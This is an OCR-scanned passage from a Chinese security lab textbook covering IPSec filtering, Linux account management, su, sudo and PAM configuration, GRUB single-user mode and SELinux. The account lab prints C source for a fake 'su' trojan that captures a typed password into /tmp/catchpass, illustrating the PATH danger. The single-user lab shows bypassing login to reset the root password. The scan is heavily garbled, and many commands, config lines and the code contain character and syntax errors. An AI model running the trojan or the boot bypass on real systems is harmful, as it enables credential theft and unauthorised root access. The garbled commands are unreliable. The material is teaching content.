

图 8-54 ”规则 编辑 界面 


@ 单 击 【筛选 器 操作 】 标 签 。 单 击 【 许 可 】， 如 图 8-55 所 示 。 


单 击 【身份 验证 方法 】 标 签 ， 单 击 【添加 】 添加 使 用 预 共享 密 钥 的 方式 进行 身 
份 验 证 ， 如 图 8-56 所 示 。 


@ 单 击 【确定 】 完成 规则 编辑 。 
选中 【入 站 TCP 80 和 25 筛选 器 列表 】 复 选 框 ， 单 击 【 关 闭 】。 
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新 身份 验证 方法 尾 性 
身份 验证 方法 | 


XX 和 EA 身份 验证 方法 指定 了 计算 机 间 如 何 建立 信任 。 


卫 篆 渤 器 列表 第 渤 器 操作 | 身份 验证 方法 | 隆 道 设置 | 连接 类 型 | 


个 Active Directory 默认 值 Kerberos V5 协议 ) 0) 
个 使 用 由 此 证 书 颁发 机 构 CA) 颁发 的 证 书 C): 


允许 不 安全 的 | 
他 使 用 此 字符 审 他 共 享 密 钥 ) GE) 
estIPSecl23 


添加 W)..， | 编辑 四 .| _ 删除) | 订 使 用 “添加 向 导 ” 凶 ) 


图 8-55 ”筛选 器 操作 图 8-56 ”设置 身份 认证 方法 


IPSec 策略 检查 发 往 本 地 接口 上 的 TCP 端口 80 和 TCP 端口 25 的 数据 包 , 然后 将 这 
些 数据 包 与 允许 数据 包 通 过 此 接口 的 “许可 ”筛选 器 操作 相 匹 配 。 

(3) 以 类 似 的 方式 配置 另外 一 台 机 器 ， 使 得 该 机 器 可 以 通过 IPSec 的 方式 访问 本 机 
80 端口 和 25 端口 。 注 意 ， 配 置身 份 验证 方式 使 用 同样 的 密码 预 共 享 密 钥 进行 身份 认证 。 

(4) 测试 ， 并 使 用 抓 包工 具 查 看 通信 结果 。 

【实验 报告 】 

(1) 详细 叙述 配置 IPSec 的 过 程 。 

(2) 叙述 测试 结果 。 


【思考 题 】 
IPSec 能 够 防止 哪些 网 络 攻击 ? 
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51 ”认证 和 授权 管理 


9.1.1 用 户 管理 


【实验 目的 】 
掌握 Linux 下 用 户 管理 的 常用 命令 ， 了 解 Linux 用 户 管理 的 一 般 原则 。 学 习 Linux 
F PAM 的 配置 方法 。 


【原理 简介 】 

在 安装 Linux 时 ， 系 统 会 自动 建立 一 个 超级 用 户 root，root 拥有 最 高 权限 ， 可 以 创 
建 或 删除 个 人 用 户 账号 ， 对 系统 进行 维护 ， 对 所 有 文件 具有 完全 权限 。root 的 工作 之 一 
就 是 为 主机 上 所 有 用 户 创建 和 管理 账号 。 在 Linux 操作 系统 中 ， 每 个 文件 和 程序 必须 属 
于 某 一 个 “用 户 ”。 每 一 个 用 户 都 有 一 个 唯一 的 身份 标识 叫 作用 户 ID (User ID，UID)。 
每 一 个 用 户 也 至 少 需要 属于 一 个 “用 户 分 组 ” 也 就 是 由 系统 管理 员 建 立 的 用 户 小 团体 。 
用 户 可 以 归属 于 多 个 用 户 分 组 。 与 用 户 一 样 ， 用 户 分 组 也 有 一 个 唯一 的 身份 标识 叫 作用 
户 分 组 ID (Group ID，GID )。 

对 某 个 文件 或 程序 的 访问 是 以 它 的 UID 和 GID 为 基础 的 。 一 个 执行 中 的 程序 继承 
了 调用 它 的 用 户 的 权利 和 访问 权限 。 普 通用 户 只 能 访问 他 们 拥有 的 或 者 有 权限 执行 的 文 
件 ， 根 用 户 能 够 访问 系统 全 部 的 文件 和 程序 ， 而 不 管 是 否 拥有 它们 。NT 中 的 普通 用 户 
可 以 分 配 到 系统 管理 员 (Administrator) 的 访问 权限 , 但 是 Linux 中 的 普通 用 户 就 没有 办 
法 采用 相同 的 机 制 被 授予 根 用 户 的 权限 。 

每 个 账户 都 必须 有 一 个 口令 ， 和 否则 就 根本 不 可 能 登录 。 这 对 系统 安全 性 十 分 关 
键 。 口 令 的 选择 是 非常 重要 的 ， 一 些 常用 的 、 容 易 被 猜 到 的 口令 会 给 系统 带 来 不 安全 
的 因素 。 

【实验 环境 】 

Linux 操作 系统 内 核 版 本 2.6 以 上 。 

【实验 步骤 】 

1. 以 root 用 户 登录 系统 

添加 新 用 户 ， 在 命令 终端 内 使 用 命令 “useradd newuser1”， 用 useradd 增加 一 个 用 户 
后 应 该 立刻 用 passwd 给 新 用 户 修改 密码 ， 可 以 用 -d 参数 设置 新 用 户 的 主 目录 〈 例 如 : 
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useradd newuser -d /www), 也 可 以 用 -g 参数 为 用 户 指定 新 组 名 (例如 : useradd newuser -g 
linuxusers), 还 可 以 用 -G 参数 把 新 用 户 设 成 系统 其 他 一 些 组 的 成 员 ( 例 如 : useradd newuser- 
G users，shutdown)。 实 验 过 程 如 下 : 


[root@localhost ~]# useradd testuser 

[root@localhost ~]# passwd testuser 

Changing password for user testuser. 

New UNIX password: 

Retype new UNIX password: 

passwd: all authentication tokens updated successfully. 
[root@localhost ~]# 


在 Red Hat Linux 中 还 可 以 使 用 系统 提供 的 管理 工具 进行 添加 用 户 ， 方 法 为 以 root 
用 户 登 录 系 统 ， 单 击 Red Hat Linux 主 菜单 中 的 【 系 
统 设置 】|【 用 户 群 组 】 菜 单项 ， 出 现 用户 管 理 器 界 
面 ， 单 击 【 添 加 用 户 】， 出 现 如 图 9-1 所 示 的 界面 ， 
在 这 个 界面 上 可 以 编辑 用 户 的 信息 包括 : 用 户 名 ， 
用 户口 令 , 用 户 登 录 的 Shell, 用 户 目录 以 及 用 户 组 。 
编辑 好 用 户 信息 后 ， 单 击 OK 即 可 把 用 户 添 加 到 系 
统 中 。 

2. 修改 现 有 用 户 的 账号 

创建 好 用 户 之 后 ， 可 以 对 现 有 用 户 的 账号 信息 


Login Shell: /bivbash Ea 


加 Create home directory 


Home Directory: |/home/testuser 


进行 修改 。 up:lboz ”有 自 
修改 密码 : 普通 用 户 可 以 用 passwd 修改 自己 的 
密码 ， 只 有 管理 员 才能 用 passwd username 为 其 他 用 [Xen || Bor | 


户 修改 密码 。 图 9-1 创建 新 用 户 界面 
修改 用 户 Shell 设置 :使 用 chsh 命令 可 以 修改 自 
己 的 Shell， 只 有 管理 员 才能 用 chsh username 为 其 他 用 户 修改 Shell 设置 。 注 意 ， 指 定 的 
Shell 必须 是 列 入 /etc/shells 文件 中 的 Shell， 否 则 该 用 户 将 不 能 登录 。 
修改 主 目 录 设 置 ，usermod -d(new home directory)(username)， 如 果 想 将 现 有 主 目 录 
的 主要 内 容 转移 到 新 的 目录 , 应 该 使 用 -m 开关 , 如 下 所 示 : usermod -d -m/www/newuserl 
newuserl。 
修改 UID: usermod -u UID username， 主 目录 中 所 有 该 用 户 所 拥有 的 文件 和 目录 都 
将 自动 修改 UID 设置 。 但 是 ， 对 于 主 目录 外 该 用 户 所 拥有 的 文件 ， 只 能 手工 用 chown 命 
令 修改 所 有 权 设 置 。 

修改 默认 组 设置 : usermmame -g(group name) or GID username。 

修改 账号 的 有 效 期 : 如 果 使 用 了 影子 口令 ， 则 可 以 使 用 如 下 命令 来 修改 一 个 账号 的 
有 效 期 : usermod -e MM/DD/YY username。 例如 把 用 户 newuser 的 有 效 期 定 为 12/31/01: 
usermod -e 12/31/01 newuser。 
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删除 或 禁止 用 户 账 号 : 使 用 userdel 命令 删除 现 有 用 户 。 例 如 ， 下 面 的 命令 将 删除 
bluewind 用 户 : 


usedel bluewind 


如 果 想 同时 删除 该 用 户 的 主 目录 以 及 其 中 的 所 有 内 容 ， 要 使 用 -r 开关 来 递归 删除 。 
值得 注意 的 是 ， 无 法 删除 已 经 进入 系统 的 用 户 ， 如 果 想 强行 完成 ， 需 要 先 killall 有 关 它 
的 进程 ， 然 后 再 运行 userdel 命令 。 

如 果 只 是 想 暂 时 禁止 某 个 账号 ， 可 以 使 用 下 列 方法 。 

使 用 无 效 的 Shell。 例 如 ， 使 用 usermod -s newshell username 将 用 户 的 Shell 改 为 
/bin/false《〈 最 好 把 它 列 入 /etc/shells 文件 里 )。 

使 该 账号 过 期 。 如 果 使 用 影子 口令 ， 可 使 用 usermod -e MM/DD/YY username 命令 
使 该 账号 过 期 。 

如 果 想 禁止 所 有 账号 (root 账号 当然 除外 ) 的 访问 ， 可 以 创建 一 个 名 为 /etcnologin 
的 文件 ， 说 明 系统 暂时 不 允许 访问 。 注 意 ， 先 确认 还 能 用 root 直接 登录 才 使 用 这 个 办 法 ， 
否则 系统 无 法 登录 。 
口令 定期 更 换 是 系统 管理 员 用 来 防止 机 构 内 不 恨 口 令 的 另 一 种 技术 。 口 令 定期 更 换 
启用 后 系统 在 一 段 预先 设 定 的 时 间 后 〈 通 常 是 
90 天 )， 提 示 用 户 创建 一 个 新 口令 。 可 以 使 用 
chage 命令 的 -M 选项 指定 口令 的 最 长 有 效 期 。 
例如 ， 要 把 用 户 的 口令 设置 为 90 天 后 过 期 ， 
可 输入 以 下 命令 : chage -M 90 <username>。 还 
可 以 使 用 图 形 化 的 用 户 管理 器 (system- 
config-users) 程序 。 

出 现 用 户 管理 界面 ， 选 择 要 修改 的 用 户 
名 ， 单 击 【 属 性 】 工 具 栏 ， 出 现 如 图 9-2 所 示 
的 界面 ， 在 该 界面 上 可 以 对 用 户 的 相关 信息 进 
行 修改 ， 如 果 要 删除 用 户 , 单 击 【 删 除 】 即 可 。 图 9-2 用 户 属性 界面 

3. 用 户 环 境 设 置 

在 Linux 环境 中 想 查看 当前 用 户 的 PATH， 可 以 用 set 或 env 命令 来 查看 ， 普 通用 户 
的 PATH 会 像 这 样 PATH=/bin:/usrbin:/usrocal/bin:/usrbinXX11， 对 于 想 执行 不 在 这 些 目 
录 下 的 命令 时 ,用户 需要 输入 ./。 如 果 有 些 系统 管理 员 为 了 省 事 , 在 自己 的 路 径 中 ， 也 就 
是 PATH 后 如 果 加 了 一 个 “.”， 那 么 就 意味 着 在 执行 命令 时 以 当前 目录 为 最 先 查 找 的 路 
径 。 可 这 样 也 会 造成 一 些 严重 的 问题 ， 设 想 一 个 黑客 取得 了 一 个 普通 用 户 的 权限 ， 这 样 
他 会 自己 编写 一 个 类 似 su 这 样 的 程序 来 骗 得 管理 员 的 超级 用 户 密码 。 

一 个 简单 su 程序 的 源 代 码 su.c 的 内 容 如 下 : 


int main() 
{ 
char buf[128], passwd[20]: 
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System("/bin/stty -echo"):; 
Print("Password: ") ; 
Scanf ("%s", passwd): 
system("/bin/sty echo"):; 
printf("\n Incorrect password\n"); 
sprintf (buf, "/bin/echo %s >>/tmp/catchpass", passwd):; 
System (buf) : 
system("/bin/rm /tmp/su"):; 
exit(0); 
} 


进行 编译 : 
$gcc -o su su.c 
$su 


Password: [不 可 见 的 密码 ] 


Incorrect Password: 
这 时 可 以 到 /tmp/ 下 看 到 刚才 输入 的 密码 已 被 存 到 /tmp/catchpass 这 个 文件 中 了 。 
【实验 报告 】 
(1) 叙述 用 户 管理 常用 命令 ， 举 例 说 明 使 用 方法 。 
(2) 了 解 Linux 下 常用 组 的 权限 特点 。 
【思考 题 】 
(1) 比较 分 析 Linux 用 户 管理 系统 与 Windows 用 户 管理 系统 。 
(2) 把 下 列 用 户 添加 到 系统 中 ， 然 后 将 使 用 其 中 之 一 测试 登录 过 程 。 


用 户 名 称 口令 到 期 
Userl User One 学 必须 
User2 UserTwo 人 室 ) 
User3 User Three 必须 
User4 User Four 〈 空 ) 


9.1.2 ”授权 管理 


【实验 目的 】 
了 解 和 掌握 Linux 下 授权 管理 的 主要 方法 ， 熟 悉 常用 工具 的 配置 。 
【原理 简介 】 


在 Linux 操作 系统 中 ，root 的 权限 是 最 高 的 。 在 系统 中 ， 每 个 文件 、 目 录 和 进程 ， 
都 归属 于 某 一 个 用 户 ， 没 有 许可 其 他 普通 用 户 是 无 法 操作 的 ， 但 对 root 除外 。root 用 户 
的 特权 性 还 表现 在 root 可 以 超越 任何 用 户 和 用 户 组 来 对 文件 或 目录 进行 读 取 、 修改 或 删 
除 (在 系统 正常 的 许可 范围 内 ); 对 可 执行 程序 的 执行 、 终 止 ; 对 硬件 设备 的 添加 、 创 建 
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和 移 除 等 ， 也 可 以 对 文件 和 目录 进行 属 主 和 权限 修改 ， 以 适合 系统 管理 的 需要 。 

除非 在 组 织 中 需要 多 个 系统 管理 员 管 理 同一 个 系统 , 这 就 需要 有 多 个 超级 用 户 账号 。 
这 有 利于 各 个 管理 员 明 确 责任 ， 通 过 日 志 知 道 不 同 的 人 分 别 做 过 什么 事 。 

当 以 普通 权限 的 用 户 登录 系统 时 ， 有 些 系统 配置 及 系统 管理 必须 通过 超级 权限 用 户 
完成 ， 比 如 对 系统 日 志 的 管理 、 添 加 和 删除 用 户 。 而 如 何 才 能 不 直接 以 root 登录 ， 却 能 
从 普通 用 户 切 换 到 root 用 户 下 才能 进行 操作 系统 管理 需要 的 工作 ， 这 就 涉及 超级 权限 管 
理 的 问题 。 获 取 超 级 权限 的 过 程 ， 就 是 切换 普通 用 户 身 份 到 超级 用 户 身 份 的 过 程 ， 这 个 
过 程 主要 是 通过 su 和 sudo 来 解决 的 。 

su 命令 就 是 切换 用 户 的 工具 ， 以 普通 用 户 登 录 的 ， 但 要 用 到 超级 用 户 权 限时 ， 解 决 
办 法 有 两 个 : 一 是 退出 普通 用 户 ， 重 新 以 root 用 户 登 录 ; 二 是 用 su 命令 来 切换 到 root 
下 进行 操作 ,等 任务 完成 后 再 退出 root。su 的 确 为 管理 带 来 了 方便 , 通过 切换 到 root 下 ， 
能 完成 所 有 系统 管理 ， 只 要 把 root 的 密码 交 给 任何 一 个 普通 用 户 ， 他 都 能 切换 到 root 来 
完成 所 有 的 系统 管理 工作 。 但 通过 su 切换 到 root 后 ， 也 有 不 安全 因素 ， 因 为 它 需要 用 到 
超级 用 户 的 口令 ， 当 用 户 多 时 容易 造成 秘密 泄漏 。 超 级 用 户 root 的 密码 应 该 掌握 在 少数 
用 户 手中 , 因此 su 工具 在 多 人 参与 的 系统 管理 中 ,并 不 是 最 好 的 选择 ，su 只 适用 于 一 两 
个 人 参与 管理 的 系统 。 

为 普通 用 户 分 配 特 权 , 还 可 以 使 用 sudo 命令 允许 普通 用 户 执行 超级 用 户 才能 执行 的 
命令 。 为 了 安全 起 见 ， 不 要 把 超级 用 户 的 所 有 权限 轻易 分 配给 别人 。 所 以 ， 当 一 些 用 户 
必须 访问 某 些 root 用 户 才能 访问 的 内 容 时 , 可 以 配置 sudo 以 允许 单独 的 普通 用 户 运 行 特 
权 命 令 。 

sudo 是 允许 系统 管理 员 让 普通 用 户 执行 一 些 或 者 全 部 的 root 命令 的 一 个 工具 ， 如 
halt、reboot、su 等 。 这 样 不 仅 减 少 了 root 用 户 的 登录 和 管理 时 间 , 同样 也 提高 了 安全 性 。 
sudo 不 是 对 shell 的 一 个 代替 ， 它 是 面向 每 个 命令 的 。 它 的 特性 主要 有 以 下 几 点 。 

e sudo 能 够 限制 用 户 只 在 某 台 主机 上 运行 某 些 命令 。 

e sudo 提供 了 丰富 的 日 志 , 详细 地 记录 了 每 个 用 户 做 了 什么 。 它 能 够 将 日 志 传 到 中 

心 主机 或 者 日 志 服务 器 。 
e sudo 使 用 时 间 惟 文件 来 执行 类 似 的 “检票 ”系统 。 当 用 户 调用 sudo 并 且 输 入 它 
的 密码 时 ， 用 户 获 得 了 一 张 存活 期 为 Smin 的 票 〈 这 个 值 可 以 改变 )。 

sudo 的 配置 文件 是 sudoers 文件 ， 它 允许 系统 管理 员 集 中 管理 用 户 的 使 用 权限 和 使 
用 的 主机 。 它 所 存放 的 位 置 默认 是 在 /etc/sudoers， 属 性 必须 为 0411。sudo 命令 允许 已 经 
在 /etc/sudoers 文件 中 指定 的 用 户 运 行 超级 用 户 命令 。 例 如 ， 一 个 已 经 获得 许可 的 普通 用 
户 可 以 运行 : sudo vi /etc/passwd。 

Linux 操作 系统 目前 都 支持 插件 式 认证 模块 PAM) 认证 机 制 ，PAM 采用 模块 化 设 
计 和 插件 功能 , 使 得 用 户 可 以 轻易 地 在 应 用 程序 中 插入 新 的 认证 模块 或 替换 原先 的 组 件 ， 
而 不 必 对 应 用 程序 做 任何 修改 。 应 用 程序 可 以 通过 PAM API 方 便 地 使 用 PAM 提供 的 各 
种 认证 功能 ， 而 不 必 了 解 太 多 的 底层 细节 。 它 解决 了 多 认证 机 制 的 集成 问题 ， 所 以 单个 
程序 可 以 轻易 集成 多 种 认证 机 制 ， 如 Kerberos 认证 机 制 和 Diffie-Hellman 认证 机 制 等 ， 
但 用 户 仍 可 以 用 同一 个 口令 登录 而 感觉 不 到 采取 了 各 种 不 同 的 认证 方法 。 
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【实验 环境 】 

Linux 操作 系统 内 核 版 本 2.6 以 上 。 

【实验 步骤 】 

1. 超级 用 户 权 限 授权 管理 

(1) 使 用 su 命令 对 用 户 授权 : 输入 su 命令 后 ， 用 户 会 被 提示 输入 根 口令 ， 经 验证 
后 ， 他 就 会 得 到 一 个 根 shell， 拥 有 root 权限 。 通 过 su 命令 登录 后 ， 用 户 就 成 为 根 用 户 ， 
并 且 对 系统 有 绝对 的 管理 权 。 用 户 成 为 根 用 户 后 可 以 使 用 su 命令 来 变 成 系统 上 的 另 一 
个 用 户 而 不 必 输 入 口令 。 结 果 如 下 : 


[testuser@ localhost ~]$ su - root 

Password: 

[root@localhost ~]# 

[root@localhost ~]# useradd testuserl 

[root@localhost ~]# passwd testuserl 

Changing password for user testuserl. 

New UNIX password: 

Retype new UNIX password: 

passwd: all authentication tokens updated successfully. 
[root@localhost ~]#exit 


[testuser@ localhost ~] 


(2) 因为 该 程序 功能 非常 强大 ， 需 要 限制 能 够 使 用 这 个 命令 的 人 员 。 一 种 方法 是 把 
用 户 添加 到 一 个 叫 作 wheel 的 特殊 管理 组 群 。 以 根 用 户 身份 输入 以 下 命令 : 

usermod -G wheel <username> 

在 上 面 的 命令 中 ， 把 <usemame> 替 换 成 被 添加 到 wheel 组 群 中 的 用 户 名 。 

在 文本 编辑 器 中 打开 su (/etcpam.d/su) 的 PAM 配置 文件 ， 删 除 以 下 行 的 注释 符 
号 [#1]: 

auth required /lib/security/$ISA/pam wheel.so use uid 


成 功 后 将 只 允许 管理 性 组 群 wheel 使 用 该 程序 。 

操作 如 下 : 

首先 修改 su(/etc/pam.d/su ) 的 PAM 配置 文件 .以 testuser 用 户 登录 系统 ,尝试 su root， 
结果 如 下 : 


[testuser@mylivx ~]$ su - root 
Password: 
su: incorrect password 


[testuser@mylivx ~]$ 


系统 显示 密码 错误 。 
以 root 身份 登录 系统 ， 把 testuser 用 户 加 到 用 户 组 wheel 中 ,然后 再 尝试 su root， 结 
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果 如 下 : 


[root@mylivx etc]# usermod -G wheel testuser 
[root@mylivx etc]# su - testuser 
[testuser@mylivx ~]$ su - root 

Password: 

[root@mylivx ~]# 


(3) 使 用 sudo 为 用 户 授 权 : sudo 命令 提供 了 另 一 种 授予 用 户 管理 权限 的 方法 。 用 户 
在 管理 命令 前 加 一 个 sudo 命令 ， 这 个 用 户 就 会 被 提示 输入 他 自己 的 口令 。 验证 后 ， 如 果 
这 个 命令 被 授予 该 用 户 执行 ， 它 就 会 以 根 用 户 身份 执行 该 命令 。sudo 命令 的 基本 格式 
如 下 : 


sudo <command> 


在 上 面 的 例子 中 ，<command> 应 该 被 奉 换 为 通常 保留 给 根 用 户 使 用 的 命令 。 

sudo 命令 提供 了 高 度 的 灵活 性 。 例 如 ， 只 有 列举 在 /etc/sudoers 配置 文件 中 的 用 户 被 
允许 使 用 sudo 命令 ， 并 且 命 令 是 在 用 户 的 而 不 是 根 的 shell 中 被 执行 。 这 意味 着 根 shell 
可 以 被 完全 禁用 。sudo 命令 还 提供 了 完整 的 审核 渠道 。 每 次 成 功 的 验证 都 被 记录 在 
/var/log/messages 文件 中 ， 所 使 用 的 命令 以 及 使 用 者 的 用 户 名 被 记录 在 /varlog/secure 文 
件 中 。sudo 命令 的 另 一 个 优越 性 是 ， 管 理 员 可 以 根据 需要 给 不 同 的 用 户 以 不 同 的 命令 使 
用 权限 。sudo 配置 文件 为 /etc/sudoers， 管 理 员 使 用 vi sudo 命令 进行 编辑 。 

以 用 户 名 newuserl 登录 ， 输 入 命令 : passwd user1， 结 果 如 下 。 


[newuserl@mylivx ~]$ passwd userl 


passwd: Only root can specify a user name. 


[newuserl@mylivx ~]$ 


表明 newuserl 用 户 没有 权限 为 其 他 用 户 更 改 密码 。 下 面 赋予 newuserl 为 其 他 用 户 
更 改 密码 的 权限 。 

以 root 登录 ， 输 入 命令 : vi sudo， 对 sudo 文件 进行 编辑 ， 在 授权 时 不 允许 为 root 
更 改口 令 ， 修 改 如 图 9-3 所 示 ， 阴 影 部 分 为 新 添加 的 字段 。 

(4) 以 用 户 名 newuserl 登录 系统 ， 测 试 passwd 命令 。 在 初次 使 用 sudo 命令 时 需要 
输入 newuserl 的 口令 ， 口 令 成 功 后 才能 执行 passwd 命令 。 


[newuserl@mylivx ~]$ sudo passwd userl 

Password: 

Changing password for user testuser. 

New UNIX password: 

Retype new UNIX password: 

passwd: all authentication tokens updated successfully. 
[newuserl@mylivx ~]$ 
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# Host alias specification 

# User alias specification 

User_Alias USER=newuserl 

# Cmnd alias specification 

Cmnd Alias PASSWD=/usr/bin/passwd [A-Za-z]*,!/usr/bin/passwd 


# Defaults specification 

# User privilege specification 

root ALL=(ALL)ALL 

# Uncomment to allow people in group wheel to run all commands 
#%wheelALL=(ALL) ALL 

# Same thing without a password 

#%wheelALL=(ALL) NOPASSWD:ALL 

# Samples 

#%users ALL=/sbin/mount /cdromysbin/umount /cdrom 
#%users localhost=/sbin/shutdown -h now 

USER ALL=(ALL) PASSWD 


图 9-3 编辑 sudoers 


2. 利用 PAM 进行 权限 控制 
(1) 控制 使 用 SSH 登录 的 允许 用 户 。 在 /etc/pam.d/sshd 中 添加 如 下 命令 : 


auth required pam listfile.so item-user sense=allow file=/etc/sshusers onerr=fail 


其 中 允许 的 用 户 被 放 在 /etc/sshuser 文件 中 ， 临 时 屏蔽 除 管 理 员 以 外 的 所 有 用 户 ， 创 建 
/etc/nologin 文件 即 可 ， 并 可 在 该 文本 文件 中 写 明 屏蔽 原因 (将 在 登录 时 显示 )。 
(2) 控制 密码 可 以 重 试 三 次 , 不 提示 输入 旧 密 码 , 在 /etc/pam.d/sshd 中 添加 如 下 命令 : 


passwd password required pam cracklib.so retry=3 
passwd password required pam pwdb.so use authtok 


(3) 密码 强度 控制 ,新 密码 使 用 MD5 方式 加 密 ， 密 码 长 度 为 10 位 ， 其 中 两 位 数字 ， 
两 位 其 他 字符 ， 至 少 三 位 不 得 与 旧 密 码 相同 ， 在 /etc/pam.d/passwd 中 添加 如 下 命令 : 


password required pam cracklib.so difok=3 minlen=10 dcredit= 2 ocredit=2 
password required pam pwdb.so use authtok nullok md5 


然后 使 用 一 个 用 户 名 登录 系统 (不 要 使 用 root 登录 )， 试 着 为 该 用 户 更 改口 令 。 

(4) 配置 vsftp 的 认证 方式 。 下 面 是 vsftp 服务 器 利用 PAM 模块 进行 用 户 认证 的 三 
个 步骤 。 首 先 用 pam_ftp 模块 检查 当前 用 户 是 否 为 匿名 用 户 ， 如 果 是 匿名 用 户 ， 则 
sufficient 控制 标志 表明 无 须 再 进行 后 面 的 认证 步骤 ， 直 接 通 过 认证 ;否则 继续 使 用 
pam_unix_auth 模块 来 进行 标准 的 Linux 认证 ， 即 用 /etc/ passwd 和 /etc/shadow 进行 认证 ; 
通过 了 pam_unix_auth 模块 的 认证 之 后 ， 还 要 继续 用 pam _listfile 模块 来 检查 该 用 户 是 否 
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出 现在 文件 /etc/ ftpusers 中 ， 如 果 是 则 该 用 户 被 deny 掉 。 在 /etc/pam.d/ftp 中 添加 如 下 
命令 : 


auth sufficient pam ftp.so 


auth required pam unix auth.so use first pass 
auth required pam listfile.so onerr=succeed item=user sense=deny 
file=/etc/ftpusers 


(5) 控制 su 操作 能 够 转 成 的 用 户 。 创 建 /etc/security/suok 文件 ， 其 中 的 内 容 为 允许 


转 成 的 用 户 名 ， 比 如 (即使 用 命令 su - username 时 的 username): 


userl 
user2 


在 /etc/pam.d/su 中 添加 : 


auth required pam listfile.so onerr=fail item=user sense=allow file=/ 


etc/security/suok 


使 用 任何 其 他 用 户 名 登录 后 只 能 su 成 /etc/security/suok 文件 中 列 出 的 用 户 。 
控制 只 有 在 wheel 组 中 的 用 户 可 以 通过 密码 su 成 为 root， 可 以 在 /etc/pam.d/su 中 


添加 : 


auth sufficient pam wheel.so group=wheel 


单 月 


在 /etc/group 中 添加 wheel 组 中 的 成 员 。 


【实验 报告 】 

(1) 叙述 超级 用 户 授权 管理 操作 过 程 。 
(2) 叙述 利用 PAM 授权 管理 操作 。 
【思考 题 】 

(1) 分 析 Linux 下 权限 管理 的 特点 。 
(2) 分 析 PAM 机 制 的 优 缺点 。 


9.1.3 ” 单 用 户 模 式 


【实验 目的 】 
掌握 Linux 环境 中 单 用 户 模式 的 作用 和 设置 方法 , 掌握 单 用 户 模式 的 安全 保护 方法 。 
【原理 简介 】 
当 系 统 被 破坏 、 密 码 忘 记 或 者 配置 不 当 遭 遇 登 录 困 难 时 ， 可 以 使 用 引导 计算 机 进入 
日 户 模式 ， 不 需要 输入 任何 密码 ， 在 单 用 户 模式 中 ， 计 算 机 的 运行 级 别 为 1， 本 地 文 


件 系统 被 挂 载 ， 但 是 网 络 不 会 被 激活 。 用 户 有 一 个 可 用 的 系统 维护 Shell， 用 户 拥 有 root 
权限 ， 可 以 重新 设置 root 密码 ， 具 有 很 高 的 安全 风险 。 需 要 加 以 保护 防止 其 他 用 户 随 意 
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使 用 单 用 户 模 式 进 入 系统 。 
【实验 环境 】 
Linux 操作 系统 ， 启 动 管理 器 为 GRUB。 
【实验 步 又 】 
(1) 在 出 现 GRUB 画面 时 ， 用 上 下 键 选中 平时 启动 Linux 的 那 一 项 ， 然 后 按 E 键 。 
(2) 可 以 看 到 用 于 所 选 卷 标的 配置 文件 中 的 一 个 项 目 列表 ， 如 下 。 


root (hd0,0) 


kernel /vmlinuz-2.6.11-1.1369_FC4 ro root=/dev/VolGroup00/LogV 


initrd /initrd-2.6.11-1.1369 FC4.img 


(3) 选择 起 首 为 kemel 的 行 ， 然 后 输入 e 来 编辑 那 一 行 。 

(4) 转 到 行 尾 ， 然 后 输入 single 〈 按 空格 键 ， 然 后 输入 single)。 按 Enter 键 来 退出 
编辑 模式 。 

(5) 回 到 了 GRUB 屏幕 后 ， 输 入 b 来 引导 入 单 用 户 模式 ， 进 入 单 用 户 模式 后 党 试 更 
改 root 用 户 的 口令 ， 然 后 重启 系统 使 用 新 口令 进入 系统 。 

(6) 如 果 启 动 管理 器 是 LILO， 在 LILO 引导 提示 如果 使 用 的 是 图 形 化 LILO， 必 
须 按 Ctrl+X 来 退出 图 形 化 屏幕 后 再 进入 root) 后 输入 : linux single。 

(7) 为 了 防止 系统 被 其 他 用 户 利用 单 用 户 模式 获取 root 权限 ， 需 要 给 GRUB 添加 口 
令 。 以 root 身份 登录 系统 ， 先 用 /sbin/grub-md5-crypt 生成 加 密 的 口令 ， 然 后 编辑 /boot/ 
grub/grub.conf 文件 ,在 timeout 下 面 加 上 一 行 : password=--md5 <your crypt password>; 用 
刚刚 生成 的 密码 替换 <your crypt password>， 保 存 后 重启 就 可 以 了 ， 这 时 候 再 进入 单 用 户 
模式 ， 就 需要 输入 密码 才 行 。 

【实验 报告 】 

(1) 描述 实验 过 程 ， 了 解 进入 单 用 户 模 式 后 用 户 的 权限 。 

(2) 分 析 实 验 口令 保护 GRUB 的 破解 方法 。 

【思考 题 】 

除了 使 用 单 用 户 模式 进入 系统 外 ， 找 出 其 他 方式 能 够 绕 过 操作 系统 的 访问 控制 措施 
对 系统 进行 操作 的 方法 。 


9.1.4 ” ”SELinux 安全 配置 


【实验 目的 】 

掌握 Linux 环境 中 单 用 户 模式 的 作用 和 设置 方法 , 掌握 单 用 户 模式 的 安全 保护 方法 。 

【原理 简介 】 

SELinux 是 2.6 版 本 的 Linux 内 核 中 提供 的 强制 访问 控制 (MAC) 系统。 对 于 目前 
可 用 的 Linux 安全 模块 来 说 ，SELinux 是 功能 最 全 面 ， 而 且 测 试 最 充分 的 ， 它 是 在 20 年 
的 MAC 研究 基础 上 建立 的 。SELinux 在 类 型 强制 服务 器 中 合并 了 多 级 安全 性 或 一 种 可 


M3 


选 的 多 类 策略 ， 并 采用 了 基于 角色 的 访问 控制 概念 。 

SELinux 系统 比 起 通常 的 Linux 系统 来 ， 安 全 性 能 要 高 得 多 ， 它 通过 对 于 用 户 、 进 
程 权限 的 最 小 化 ， 即 使 受到 攻击 ， 进 程 或 者 用 户 权限 被 夺 去 ， 也 不 会 对 整个 系统 造成 重 
大 影响 。 

接 下 来 介绍 SELinux 的 一 些 特点 。 

特点 1: MAC (Mandatory Access Control) 一 一 对 访问 的 控制 彻底 化 。 

对 于 所 有 的 文件 、 目 录 、 端 口 这 类 资源 的 访问 ， 都 可 以 是 基于 策略 设 定 的 ， 这 些 策 
略 是 由 管理 员 定 制 的 ， 一 般 用户 没 有 权限 更 改 。 

特点 2: TE (Type Enforcement) 一 一 对 于 进程 只 赋予 最 小 的 权限 。 

TE 的 概念 在 SELinux 里 非常 重要 。 它 的 特点 是 对 所 有 的 文件 都 赋予 一 个 叫 type 的 
文件 类 型 标签 ， 对 于 所 有 的 进程 也 分 别 赋予 一 个 叫 domain 的 标签 。domain 标签 能 够 执 
行 的 操作 也 是 由 access vector 在 策略 里 定好 的 。 比 如 Apache 服务 器 ，httpd 进程 只 能 在 
httpd t 里 运行 , 这 个 httpd t 的 domain 能 读 网 页 内 容 文件 赋予 httpd_sys_content t 密码 
文件 赋予 shadow_t，TCP 的 80 端口 赋予 http_port t 等 。 如 果 在 access vector 里 不 允许 
http_t 来 对 http_port t 进行 操作 ，Apache 就 无 法 启动 。 反 过 来 ， 如 果 只 允许 80 端口 ， 只 
